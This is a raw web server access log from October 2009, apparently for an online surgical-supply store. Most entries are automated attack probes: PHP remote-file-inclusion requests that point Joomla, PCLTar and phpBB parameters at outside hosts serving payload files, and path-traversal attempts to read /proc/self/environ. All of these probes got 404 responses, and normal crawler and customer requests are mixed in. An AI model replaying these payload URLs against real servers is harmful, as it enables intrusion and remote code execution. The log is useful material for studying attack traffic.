77.242.37.212 - - [06/Oct/2009:02:00:52 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:02:00:55 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:02:00:57 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
207.58.164.77 - - [06/Oct/2009:02:01:02 -0400] "GET /logs/access_log.Q109062300%20%20/index.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.58.164.77 - - [06/Oct/2009:02:01:03 -0400] "GET /logs/error_log.Q109062300%20%20/index.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:02:01:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.23 - - [06/Oct/2009:02:02:35 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:35 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:36 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:36 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:36 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:36 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:39 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:39 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:39 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:02:02:44 -0400] "GET /logs/access_log.Q109090600%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:02:02:46 -0400] "GET /logs/access_log.Q109053000//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:02:02:46 -0400] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:02:02:46 -0400] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:57 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:57 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:57 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:58 -0400] "GET /logs/access_log.Q109072000%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.203.104.59 - - [06/Oct/2009:02:02:58 -0400] "GET /index.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.203.104.59 - - [06/Oct/2009:02:02:58 -0400] "GET /logs/index.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.203.104.59 - - [06/Oct/2009:02:02:59 -0400] "GET /logs/access_log.Q109062300/index.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.203.104.59 - - [06/Oct/2009:02:02:59 -0400] "GET /logs/error_log.Q109062300/index.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:02:59 -0400] "GET /logs/access_log.Q109072000%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:03:09 -0400] "GET /logs/access_log.Q109072000%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
119.63.193.55 - - [06/Oct/2009:02:03:11 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
222.236.47.23 - - [06/Oct/2009:02:03:28 -0400] "GET /logs/access_log.Q109072000%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:02:03:35 -0400] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:02:03:35 -0400] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.129.64.174 - - [06/Oct/2009:02:03:37 -0400] "GET /logs/access_log.Q109053000//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:03:41 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:03:41 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:03:46 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:03:46 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:03:49 -0400] "GET /logs/error_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:03:49 -0400] "GET /logs/access_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:03:51 -0400] "GET /logs/access_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:03:51 -0400] "GET /logs/error_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:03:51 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:03:51 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:04:09 -0400] "GET /logs/access_log.Q109070800//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:02:04:09 -0400] "GET /logs/access_log.Q109080400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:04:12 -0400] "GET /logs/access_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:02:04:12 -0400] "GET /logs/error_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:04:18 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:02:04:18 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
174.143.3.188 - - [06/Oct/2009:02:04:45 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
174.143.3.188 - - [06/Oct/2009:02:04:45 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
174.143.3.188 - - [06/Oct/2009:02:04:45 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
174.143.3.188 - - [06/Oct/2009:02:04:45 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
195.186.64.229 - - [06/Oct/2009:02:05:12 -0400] "GET /logs/access_log.Q109051400%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 259 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:05:13 -0400] "GET /logs/access_log.Q109053000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:05:13 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:05:13 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:05:21 -0400] "GET /logs/access_log.Q109052500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:05:27 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:05:27 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:05:27 -0400] "GET /logs/access_log.Q109053000%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:02:05:28 -0400] "GET /logs/access_log.Q109053000%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 259 "-" "Mozilla/5.0"
72.9.225.71 - - [06/Oct/2009:02:05:31 -0400] "GET /logs/access_log.Q109053000%20%20//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.karuturi.com/baner.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:02:05:35 -0400] "GET /logs/access_log.Q109052500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.203.89.197 - - [06/Oct/2009:02:05:41 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.203.89.197 - - [06/Oct/2009:02:05:41 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.203.89.197 - - [06/Oct/2009:02:05:42 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.203.89.197 - - [06/Oct/2009:02:05:42 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
67.195.112.120 - - [06/Oct/2009:02:06:18 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.120 - - [06/Oct/2009:02:06:18 -0400] "GET /logs/error_log.Q109092400 HTTP/1.0" 200 6458682 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Oct/2009:02:06:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.203.104.59 - - [06/Oct/2009:02:06:47 -0400] "GET /logs/error_log.Q109062300%20%20/index.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.203.104.59 - - [06/Oct/2009:02:06:48 -0400] "GET /logs/access_log.Q109062300%20%20/index.php?meio=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:02:06:19 -0400] "GET /logs/error_log.Q109092400 HTTP/1.0" 200 6458682 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.126.132.20 - - [06/Oct/2009:02:09:31 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:09:31 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:09:31 -0400] "GET /logs/access_log.Q109051300%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:09:31 -0400] "GET /logs/access_log.Q109051300%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:09:31 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:09:31 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:09:31 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:09:31 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:09:31 -0400] "GET /logs/access_log.Q109051300%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:09:41 -0400] "GET /logs/error_log.Q109051300%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:09:41 -0400] "GET /logs/error_log.Q109051300%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:02:09:42 -0400] "GET /logs/error_log.Q109051300%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.114.130.221 - - [06/Oct/2009:02:09:43 -0400] "GET /logs/index.php?page=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.114.130.221 - - [06/Oct/2009:02:09:43 -0400] "GET /logs/access_log.Q109091300/index.php?page=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.114.130.221 - - [06/Oct/2009:02:09:43 -0400] "GET /index.php?page=http://www.framoss.ru/joomla/mambots/AinuLid1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
92.139.172.72 - - [06/Oct/2009:02:10:29 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64809 "http://www.google.fr/search?hl=fr&q=membranes+trufix+ace&btnG=Rechercher&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
92.139.172.72 - - [06/Oct/2009:02:10:31 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
92.139.172.72 - - [06/Oct/2009:02:10:31 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
92.139.172.72 - - [06/Oct/2009:02:10:31 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
92.139.172.72 - - [06/Oct/2009:02:10:31 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
92.139.172.72 - - [06/Oct/2009:02:10:31 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
92.139.172.72 - - [06/Oct/2009:02:10:31 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
92.139.172.72 - - [06/Oct/2009:02:10:31 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
